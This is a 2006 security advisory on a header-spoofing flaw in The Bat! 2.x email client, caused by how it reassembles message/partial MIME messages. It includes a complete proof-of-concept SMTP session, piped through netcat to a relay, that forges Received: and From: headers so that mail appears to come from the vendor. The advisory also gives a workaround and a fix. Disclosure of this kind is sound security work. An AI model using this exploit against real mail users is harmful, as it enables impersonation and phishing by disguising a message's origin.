SECURITY.NNOV: The Bat! 2.x message headers spoofing

2006-02-06T00:00:00
ID SECURITYVULNS:DOC:11310
Type securityvulns
Reporter Securityvulns
Modified 2006-02-06T00:00:00

Description

Title: The Bat! 2.x message headers spoofing Author: 3APA3A <3APA3A@security.nnov.ru> Homepage: http://www.security.nnov.ru/ Advisory URL: http://www.security.nnov.ru/advisories/thebatspoof.asp Vendor: RitLabs Vendor's page http://thebat.net/ Application: The Bat 2.x (2.12.04 tested) Not vulnerable: The Bat! 3.5 Remote: Yes, against client Category: Information spoofing

Intro:

The Bat! is very convenient, powerful and secure (comparing with others) MUA (Mail User Agent) with many professional features: templates, macroses, Bayesian SPAM filter, etc. This is commercial product from RitLabs.

Vulnerability:

Design flow in the way The Bat! shows message/partial messages allow attacker to spoof RFC 822 headers or original message, including all Received: and Message-ID:. It makes it possible to create untrackable message and spoof message origin, including sender's network.

Details:

The Bat! silently re-assembles partial message and shows encapsulated data. The headers shown are ones of encapsulated message. Real headers are lost completely.

Exploit:

Replace @example.com with destination address nc ip_of_smtp_relay 25 <thebatexploit.txt

-=-=-=-=- begin thebatexploit.txt -=-=-=-=- HELO example.com MAIL FROM: <phiby@example.com> RCPT TO: <phiby@example.com> DATA Date: Mon, 31 Jan 2006 13:30:00 +0300 From: 3APA3A <phiby@example.com> X-Mailer: The Bat! (v2.12.00) Organization: http://www.security.nnov.ru/ X-Priority: 3 (Normal) Message-ID: <994591752.20060130184706@thebat.net> To: Phiby <phiby@example.com> Subject: Subject: Re[7]: // Message-ID: <p#1split@ACB0994591752.20060130184706@thebat.net> MIME-Version: 1.0 Content-Type: message/partial; id="split@ACB0994591752.20060130184706@thebat.net"; number=1; total=2

Received: from mail.ritlabs.com (mail.ritlabs.com [198.63.208.135]) by mail.example.com (Postfix) with ESMTP id 9F89619EBEB for <phiby@example.com>; Mon, 31 Jan 2006 13:30:06 +0300 (MSK) Date: Mon, 31 Jan 2006 13:30:06 +0300 From: The Bat! developers <bugs@thebat.net> X-Mailer: The Bat! (v2.12.00) Organization: RitLabs X-Priority: 3 (Normal) Message-ID: <994591752.20060130184706@thebat.net> To: Phiby <phiby@example.com> Subject: Subject: Re[7]: // MIME-Version: 1.0 Content-Type: text/plain; charset=Windows-1251 Content-Transfer-Encoding: 8bit

Dear Phiby,

Best wishes for you and http://phiby.com/ . RSET MAIL FROM: <phiby@example.com> RCPT TO: <phiby@example.com> DATA Date: Mon, 30 Jan 2006 13:30:06 +0300 From: 3APA3A <phiby@example.com> Organization: http://www.security.nnov.ru/ X-Mailer: The Bat! (v2.12.00) Organization: Microsoft X-Priority: 3 (Normal) Message-ID: <994591752.20060130184706@thebat.net> To: Phiby <phiby@example.com> Subject: Subject: Re[7]: // Message-ID: <p#2split@ACB0994591752.20060130184706@microsof.com> MIME-Version: 1.0 Content-Type: message/partial; id="split@ACB0994591752.20060130184706@thebat.net"; number=2; total=2

Yours, The Bat! develpment team. . QUIT -=-=-=-=- end thebatexploit.txt -=-=-=-=-

Workaround:

Do not trust data The Bat! shows in headers.

Solution:

Upgrade to The Bat! 3.x (not free)